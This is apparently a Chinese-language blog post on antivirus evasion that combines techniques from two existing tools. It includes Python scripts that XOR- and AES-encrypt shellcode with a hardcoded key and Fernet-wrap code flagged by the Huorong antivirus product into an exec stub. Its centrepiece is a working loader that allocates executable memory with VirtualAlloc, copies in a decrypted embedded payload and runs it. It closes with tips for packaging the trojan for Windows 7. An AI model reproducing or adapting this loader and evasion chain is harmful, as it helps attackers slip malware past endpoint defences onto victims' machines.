免杀学习-python代码分析缝合

分析下市面上的两个个工具，站在巨人的肩膀上

这是一个加密的脚本，可以将对应的数据XOR加密和AES加密，用于加密shellcode（bese64编码后的bin文件）

import base64
from Crypto.Cipher import AES

def add_to_16(s):
        while len(s) % 16 != 0:
            s += '\0'
        return str.encode(s)  # 返回bytes

def aes_jiami(text):
    # 密钥长度必须为16、24或32位，分别对应AES-128、AES-192和AES-256
    key = 'LeslieCheungKwok'
    aes = AES.new(add_to_16(key), AES.MODE_ECB)
    encrypted_text = str(base64.encodebytes(aes.encrypt(add_to_16(text))), encoding='utf8').replace('\n', '')
    return encrypted_text

def xor_jiami(s,key):
    xor_s = ''
    for i in s:
        xor_s += chr(ord(i) ^ key)
    return xor_s


if __name__=='__main__':
    sc = 'shellcode'#读取shellcode
    with open('./aes-xor.txt','w') as f:
        f.write(aes_jiami(xor_jiami(sc,35)))

#用fernet加密代码的脚本
from cryptography.fernet import Fernet

#被火绒ban掉的代码
ban_code=[b'''
xxxxxxxxx
'''
           ]

for code in ban_code:
   key =Fernet.generate_key()
   f =Fernet(key)
   enc_pay =f.encrypt(bytes(code))
   output_key ="key= {0}".format(key)
   print(output_key)
   print("f_obj= Fernet(key)")
   output_enc_pay ="enc_pay= {0}".format(enc_pay)
   print(output_enc_pay)
   print("exec(f_obj.decrypt(enc_pay))")
   print("========================================")

Oxyry Python Obfuscator - The most reliable python obfuscator in the world

python代码混淆网址

#加载器
import base64
import ctypes

from Crypto.Cipher import AES

kernel32 = ctypes.windll.kernel32

def aes_jiemi(s):
    cipher = AES.new(b'LeslieCheungKwok', AES.MODE_ECB)
    return cipher.decrypt(base64.decodebytes(bytes(s, encoding='utf8'))).rstrip(b'\0').decode("utf8")

def xor_jiemi(s,key):
    xor_s = ''
    for i in s:
        xor_s += chr(ord(i) ^ key)
    return xor_s

def write_memory(buf):
    length = len(buf)

    kernel32.VirtualAlloc.restype = ctypes.c_void_p
    ptr = kernel32.VirtualAlloc(None, length, 0x3000, 0x40)

    kernel32.RtlMoveMemory.argtypes = (
        ctypes.c_void_p,
        ctypes.c_void_p,
        ctypes.c_size_t)
    kernel32.RtlMoveMemory(ptr, buf, length)
    return ptr


def run(shellcode):
    buf = ctypes.create_string_buffer(shellcode)
    ptr = write_memory(buf)
    shell_func = ctypes.cast(ptr, ctypes.CFUNCTYPE(None))
    shell_func()



if __name__ == '__main__':
    jiami_sc = 'nNTTwqBntRUVsGzFLXrB54mHCTMUkwOkgFGxbYPdb6zG2uKaUEKY4lK2dT36BaJQ9jZJ4rPVx5n0xGteS5M1f5r/hc9ab2ZAUcUipd/87CD/Vmns9lpZCaj8Cr1BXdsEpO56xJtpurJ9tbar8S+4VIX6cQ2bJefummMWD2tv8upIx8UtZigMvqryLrrQ6RN7Hab87ezQV9t9qtMBhKm2No3LA3mX/oYGWl88CBuMCqEEyntbFMKhbi8PXXDt+GvamHgmSlTPn+M54tLfoAbxy6L/MDId2TX+BrTjrbO53TNJODdgBl7Jn2SH2/ucg7VZpOoscbRSePFQo/+iCp4gqJn9h/alCY85EXuYti/14W7C41f0KSZfp0zPE5fI3lykyHWPVkZoX+LmdDg43pIybdaUgI/G1YLE9rK6o+9cBgr+BrQiehHpvl5Id8N6pKgilMIenPEwlCzEalny0uhKFVT6Kl9idOQZmds1kqLT0nyvem0lt+tffq3+a1ioGWGKybinrDOArR4P0GQrCjsoOAVWZlvuXceM7aZX1aGHEnfMNg7WQb1zfWRp3HCp1bKZ8IP+Fp3fKhpxNiHYAaGMqfBcZbIex1O6O6eg+xnNJ3TzOnQfhvfSMhtt3nzDe8OS5f1PtiMUUnOlXP8uYDlPDL6ZJxEIboziy9YdjsX0bM4A3FrDVlenTpK2wbWlOJnLEoxO7a6093Z6ILY3n201WNJR2bzvNFmBlRD0SvKPJpcB6nAR2pHjra27MNAqYq4oFingkte1G6UZBb2A3n3DyI2DgH9agOO1d4T1p0nYac4B2a/v+9NwmK1C4aQw1lOpqvQuyNS8OyFnGHZMmOkS+aYCR2bLc6vNrMVG7ys553D1mpKgi4vKvowXI/u0GoI/lSL9ehSAoMFaUdoieft2JpzVPRr1aF7JK5OAc6vnzLVASlnKCJb6Pj6MknFDJTruaW'
    sc = xor_jiemi(aes_jiemi(jiami_sc),35)
    shde = base64.b64decode(sc)
    run(shde)

最后编译main就可

这套免杀就是base64+xor+aes最后代码混淆+fernet

最后我改了下里面的加密方式以及一些小东西，缝合了一套自己的免杀，源码我就在这不放了，免得用不了多久就没了。

最后说下踩的一个坑吧，win10打包的马在win7没法用怎么办，在win7装一个python32，然后在win7打包就行了，这样哪里都能运行，注意win7装python需要安装一个插件 KB976932补丁。